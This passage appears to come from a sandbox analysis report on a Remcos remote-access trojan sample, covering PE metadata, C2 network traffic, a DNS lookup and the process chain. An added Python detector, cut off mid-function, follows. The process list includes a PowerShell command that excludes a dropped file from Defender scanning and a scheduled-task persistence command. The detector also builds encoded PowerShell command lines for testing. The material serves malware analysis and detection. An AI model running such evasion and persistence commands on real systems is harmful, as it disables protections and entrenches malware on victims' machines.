                        jnc 00007F69C8FA68E2h
                        je 00007F69C8FA68E2h
                        add byte ptr [ebp+00h], ch
                        add byte ptr [edx+00h], dl
                        add byte ptr [esi+00h], ah
                        insb
                        add byte ptr [ebp+00h], ah
                        arpl word ptr [eax], ax
                        je 00007F69C8FA68E2h
                        imul eax, dword ptr [eax], 006E006Fh
                        add byte ptr [ecx+00h], al
                        jnc 00007F69C8FA68E2h
                        jnc 00007F69C8FA68E2h
                        add byte ptr [ebp+00h], ch
                        bound eax, dword ptr [eax]
                        insb
                        add byte ptr [ecx+00h], bh
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        dec esp
                        add byte ptr [edi+00h], ch
                        popad
                        add byte ptr [eax+eax+00h], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf7d7a | 0x4f | .text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf8000 | 0x5ec | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfa000 | 0xc | .reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf4bb4 | 0x70 | .text
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        .text | 0x2000 | 0xf5e54 | 0xf6000 | c01ed7d3aea5706d55c21382168b090c | False | 0.9105889545223578 | data | 7.800755325212195 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc | 0xf8000 | 0x5ec | 0x600 | e06690897d295d8be3e2dfbeaf961bfa | False | 0.4303385416666667 | data | 4.190798740992328 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc | 0xfa000 | 0xc | 0x200 | aadc915659d3ffee815b8961a4ae2425 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_VERSION | 0xf8090 | 0x35c | data | | | 0.4197674418604651
                        RT_MANIFEST | 0xf83fc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                        DLL | Import
                        mscoree.dll | _CorExeMain
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2025-01-10T17:30:30.199994+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49702 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:30:52.640096+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49820 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:31:15.030732+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49955 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:31:37.422868+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49978 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:31:59.830523+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49979 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:32:22.205879+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49980 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:32:44.862851+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49981 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:33:07.360992+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49982 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:33:29.740356+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49983 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:33:52.157024+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49984 | 69.174.98.48 | 45682 | TCP
                        2025-01-10T17:34:14.597081+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.7 | 49985 | 69.174.98.48 | 45682 | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jan 10, 2025 17:30:08.813821077 CET | 49702 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:08.818787098 CET | 45682 | 49702 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:08.818939924 CET | 49702 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:08.825000048 CET | 49702 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:08.829823971 CET | 45682 | 49702 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:30.199810028 CET | 45682 | 49702 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:30.199994087 CET | 49702 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:30.200088978 CET | 49702 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:30.204945087 CET | 45682 | 49702 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:31.216994047 CET | 49820 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:31.221968889 CET | 45682 | 49820 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:31.222062111 CET | 49820 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:31.228585958 CET | 49820 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:31.233500957 CET | 45682 | 49820 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:52.639947891 CET | 45682 | 49820 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:52.640095949 CET | 49820 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:52.640196085 CET | 49820 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:52.644979000 CET | 45682 | 49820 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:53.652426004 CET | 49955 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:53.657316923 CET | 45682 | 49955 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:30:53.657424927 CET | 49955 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:53.674339056 CET | 49955 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:30:53.679308891 CET | 45682 | 49955 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:15.030637026 CET | 45682 | 49955 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:15.030731916 CET | 49955 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:15.030823946 CET | 49955 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:15.035939932 CET | 45682 | 49955 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:16.041994095 CET | 49978 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:16.046869993 CET | 45682 | 49978 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:16.047029018 CET | 49978 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:16.056910992 CET | 49978 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:16.061728954 CET | 45682 | 49978 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:37.420160055 CET | 45682 | 49978 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:37.422868013 CET | 49978 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:37.422868967 CET | 49978 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:37.427905083 CET | 45682 | 49978 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:38.432754040 CET | 49979 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:38.437720060 CET | 45682 | 49979 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:38.437791109 CET | 49979 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:38.442378998 CET | 49979 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:38.447145939 CET | 45682 | 49979 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:59.830437899 CET | 45682 | 49979 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:31:59.830523014 CET | 49979 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:59.830637932 CET | 49979 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:31:59.835427999 CET | 45682 | 49979 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:00.838324070 CET | 49980 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:00.843103886 CET | 45682 | 49980 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:00.843249083 CET | 49980 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:00.846787930 CET | 49980 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:00.851528883 CET | 45682 | 49980 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:22.205773115 CET | 45682 | 49980 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:22.205878973 CET | 49980 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:22.205920935 CET | 49980 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:22.210735083 CET | 45682 | 49980 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:23.459410906 CET | 49981 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:23.464250088 CET | 45682 | 49981 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:23.464344978 CET | 49981 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:23.467925072 CET | 49981 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:23.472800970 CET | 45682 | 49981 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:44.862584114 CET | 45682 | 49981 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:44.862850904 CET | 49981 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:44.862893105 CET | 49981 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:44.867722034 CET | 45682 | 49981 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:45.958169937 CET | 49982 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:45.963044882 CET | 45682 | 49982 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:32:45.963140011 CET | 49982 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:46.010931969 CET | 49982 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:32:46.015680075 CET | 45682 | 49982 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:07.360903978 CET | 45682 | 49982 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:07.360991955 CET | 49982 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:07.361078024 CET | 49982 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:07.366969109 CET | 45682 | 49982 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:08.370412111 CET | 49983 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:08.375297070 CET | 45682 | 49983 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:08.375374079 CET | 49983 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:08.379431009 CET | 49983 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:08.384246111 CET | 45682 | 49983 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:29.740257025 CET | 45682 | 49983 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:29.740355968 CET | 49983 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:29.751398087 CET | 49983 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:29.756211042 CET | 45682 | 49983 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:30.761076927 CET | 49984 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:30.765966892 CET | 45682 | 49984 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:30.770947933 CET | 49984 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:30.774450064 CET | 49984 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:30.779299021 CET | 45682 | 49984 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:52.156928062 CET | 45682 | 49984 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:52.157023907 CET | 49984 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:52.157078981 CET | 49984 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:52.161904097 CET | 45682 | 49984 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:53.167246103 CET | 49985 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:53.172205925 CET | 45682 | 49985 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:33:53.172291994 CET | 49985 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:53.176542997 CET | 49985 | 45682 | 192.168.2.7 | 69.174.98.48
                        Jan 10, 2025 17:33:53.181449890 CET | 45682 | 49985 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:34:14.597001076 CET | 45682 | 49985 | 69.174.98.48 | 192.168.2.7
                        Jan 10, 2025 17:34:14.597080946 CET | 49985 | 45682 | 192.168.2.7 | 69.174.98.48
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jan 10, 2025 17:30:08.639758110 CET | 53671 | 53 | 192.168.2.7 | 1.1.1.1
                        Jan 10, 2025 17:30:08.803601980 CET | 53 | 53671 | 1.1.1.1 | 192.168.2.7
                        Jan 10, 2025 17:32:23.213291883 CET | 54927 | 53 | 192.168.2.7 | 1.1.1.1
                        Jan 10, 2025 17:32:23.458389997 CET | 53 | 54927 | 1.1.1.1 | 192.168.2.7
                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                        Jan 10, 2025 17:30:08.639758110 CET | 192.168.2.7 | 1.1.1.1 | 0xc2d | Standard query (0) | decmainserver.webredirect.org | A (IP address) | IN (0x0001) | false
                        Jan 10, 2025 17:32:23.213291883 CET | 192.168.2.7 | 1.1.1.1 | 0x2b54 | Standard query (0) | decmainserver.webredirect.org | A (IP address) | IN (0x0001) | false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Jan 10, 2025 17:30:08.803601980 CET | 1.1.1.1 | 192.168.2.7 | 0xc2d | No error (0) | decmainserver.webredirect.org | | 69.174.98.48 | A (IP address) | IN (0x0001) | false
                        Jan 10, 2025 17:32:23.458389997 CET | 1.1.1.1 | 192.168.2.7 | 0x2b54 | No error (0) | decmainserver.webredirect.org | | 69.174.98.48 | A (IP address) | IN (0x0001) | false

                        Target ID:0
                        Start time:11:30:05
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0xec0000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1316899514.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1316899514.0000000004322000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Target ID:3
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RTdozXra.exe"
                        Imagebase:0xa00000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp8902.tmp"
                        Imagebase:0x740000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:11:30:07
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:11:30:08
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0x470000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:9
                        Start time:11:30:08
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0x130000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:10
                        Start time:11:30:08
                        Start date:10/01/2025
                        Path:C:\Users\user\Desktop\vQyKfYxzXB.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\vQyKfYxzXB.exe"
                        Imagebase:0xff0000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.3751309222.0000000001757000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        Target ID:11
                        Start time:11:30:09
                        Start date:10/01/2025
                        Path:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        Imagebase:0xb10000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 71%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:12
                        Start time:11:30:10
                        Start date:10/01/2025
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff7fb730000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:11:30:12
                        Start date:10/01/2025
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTdozXra" /XML "C:\Users\user\AppData\Local\Temp\tmp9C1D.tmp"
                        Imagebase:0x740000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:14
                        Start time:11:30:12
                        Start date:10/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff75da10000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:15
                        Start time:11:30:13
                        Start date:10/01/2025
                        Path:C:\Users\user\AppData\Roaming\RTdozXra.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\RTdozXra.exe"
                        Imagebase:0xa70000
                        File size:1'010'176 bytes
                        MD5 hash:A5E057F72B814DDCC71246B8DD092E2A
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1364291273.0000000001167000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows executables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true
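
The process list above records the whole persistence chain in three command lines: PowerShell adding a Defender exclusion for the copy that is about to be dropped in AppData\Roaming, schtasks registering a task from an XML file in Temp, and the sample relaunching itself before the staged copy RTdozXra.exe (same MD5 as the original) starts. The following is an added detection example, not part of the Joe Sandbox report. It walks process records constructed from the report's Path, Commandline and MD5 fields; the pid/ppid links are assumed (the report lists Target IDs, not parents), and a constructed -EncodedCommand variant of the exclusion command is included to exercise the base64 decoder, since the report only shows the plaintext form.

```python
"""Detect the persistence/evasion chain in a Joe Sandbox-style process list.

Added example, not part of the report. Records mirror the report's Path,
Commandline and MD5 fields; the pid/ppid links and the -EncodedCommand
variant are constructed assumptions (the report lists Target IDs, not parents).
"""
import base64
import re

# Locations a standard user can write to; an exclusion or task XML here is
# far more suspicious than one under Program Files or System32.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
EXCL_TARGET = re.compile(r"-Exclusion(?:Path|Process|Extension)\s+[\"']?([^\"'\s]+)", re.I)
TASK_XML = re.compile(r"/xml\s+[\"']?([^\"']+)", re.I)
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand (-e/-ec/-enc) payload, else cmdline unchanged.

    PowerShell encodes the script as base64 over UTF-16LE. A blob that does not
    decode cleanly is left alone so it cannot mask a plaintext cmdlet elsewhere.
    """
    m = ENC_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def encoded_cmdline(script):
    """Build a constructed 'powershell -enc <b64>' command line for a script."""
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f'"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -enc {blob}'


def classify(rec):
    """Per-process rules; returns a list of (rule, detail) for one record."""
    hits = []
    image, cmd = rec["path"].lower(), rec["cmdline"]
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        plain = decode_encoded_command(cmd)
        if "add-mppreference" in plain.lower():
            m = EXCL_TARGET.search(plain)
            target = m.group(1) if m else "?"
            where = "user-writable" if USER_WRITABLE.search(target) else "other"
            hits.append(("defender_exclusion", f"{target} [{where}]"))
    if image.endswith("\\schtasks.exe") and re.search(r"/create\b", cmd, re.I):
        m = TASK_XML.search(cmd)
        if m and re.search(r"\\Temp\\", m.group(1), re.I):
            hits.append(("schtasks_temp_xml", m.group(1)))
    return hits


def analyze(records):
    """Per-process rules plus two cross-process rules: self-spawn and staged copy."""
    by_pid = {r["pid"]: r for r in records}
    origin_by_md5, reported, alerts = {}, set(), []
    for r in records:  # assumed to be in start order
        for rule, detail in classify(r):
            alerts.append({"pid": r["pid"], "rule": rule, "detail": detail})
        parent = by_pid.get(r["ppid"])
        if parent and parent["path"].lower() == r["path"].lower():
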